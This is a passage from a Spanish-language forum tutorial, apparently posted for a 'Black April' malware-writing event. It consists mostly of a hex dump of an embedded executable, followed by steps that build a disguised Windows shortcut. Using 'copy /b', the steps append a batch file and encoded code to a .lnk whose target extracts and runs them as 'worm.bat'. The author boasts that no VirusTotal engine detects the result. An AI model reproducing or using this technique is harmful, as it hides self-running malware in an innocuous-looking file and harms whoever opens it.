00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007180B743000000000000030003000000580000800E000000400000801000000028000080000000007180B74300000000000001000100000070000080000000007180B74300000000000001000100000088000080000000007180B743000000000000010031750000A0000080000000007180B74300000000000001000A0C0000B8000000000000007180B743000000000000010000000000C8000000000000007180B743000000000000010000000000D8000000F040000028020000B0040000000000001843000014000000B0040000000000002C430000E8020000B0040000000000000000000000000000280234000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000000010000000000000001000000000000000000000000000400000001000000000000000000000000000000440000000000560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C006100740069006F006E00000000000A0CB00488010000010053007400720069006E006700460069006C00650049006E0066006F00000064010000010030004300300041003000340042003000000044002200010043006F006D00700061006E0079004E0061006D006500000000004100670065006E00630069006100200043007200610063006B0069006E00670000000000340014000100500072006F0064007500630074004E0061006D00650000000000500072006F0079006500630074006F00310000002C000A000100460069006C006500560065007200730069006F006E000000000031002E00300030000000000030000A000100500072006F006400750063007400560065007200730069006F006E00000031002E00300030000000000034001200010049006E007400650072006E0061006C004E0061006D00650000004B0065007900470065006E006D0065000000000044001A0001004F0072006900670069006E0061006C00460069006C0065006E0061006D00650000004B0065007900470065006E006D0065002E00650078006500000000000000010001002040000001000400E802000031752800000020000000400000000100040000000000800200000000000000000000000000000000000000000000000080000080000000808000800000008000800080800000C0C0C000808080000000FF0000FF000000FFFF00FF000000FF00FF00FFFF0000FFFFFF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FF9FFF999FF99FF9FF9F9F9FF9FF9FFF9F9FF9FF9F9FF9F9FF9F9F9FF9F9FFFF9F9FF9FF9F9FFFF9F9FF9F9FF9F9FFFFFF9FFF999F9FFFF99FFF9F9FF9F9FFFFFF99FFFF9F9FF9F9F9FF9F99F9F9FFFF9F9F9999FFF99FF9FF9F9F9F9FFF9FFF9FFFFFFFFFFFFFF9FFFFFFFFFFFFF999FFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFF999FFFFFFFFFFFFFFFFFFFFF9FFF9FF9FFFFFFFFFFFFFFFFFFFFFFFF9FFFF9F9999FFFFFFFFFFFFFFFFFFFFF9FFFF9F9FF9FFFFFFFFFFFFFFFFFFFFF9FFFF9FF99FFFFFFFFFFFFFFFFFFFFFF9FFFF9FFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFFFFFFFFF99999FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF999FFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFF9FFFFFFFFFFFFFFFFFFF999F999F9999FF999FF999F999F9999FF9FFF9FF9FFFF9FFFF9FFFFF9F9FF9FFF99999FFF99FF9999F9FFFFF9FF999FFFF9F9FFF9FF9F9FF9F9FF9FF9FFFF9FFFF9F9FFFF9999F99FFF999F99FF99FFFFF9F9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9FFFFFFFFFFFFFFFFFFFF9FFFFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

ahora nos ase falta el acceso directo el cuan anterior mente llamamos "6.lnk" y contendrá lo mismo en el campo destino

C:\Windows\System32\cmd.exe /c type w.lnk> worm.bat&worm.bat

ahora ya para terminar pasaremos a juntarlos con el simbolo del sistema y teclearemos esto

copy /b 6.lnk+comandos.bat+code.txt w.lnk

como resultado nos creara el archivo "w.lnk" el cual si ejecutamos %&$+#01(*%$ ya saben lo que pasa jajajajaja

Saludos Flamer y hay esta el tutorial que prometí ase muchos años Feliz Abril Negro

Nota: y si le pasan el virustotal verán que ninguno lo detecta hasta ahora

Páginas: 1 2 3 [4] 5 6 7 8 9 10 11 12 13 14 15 16 17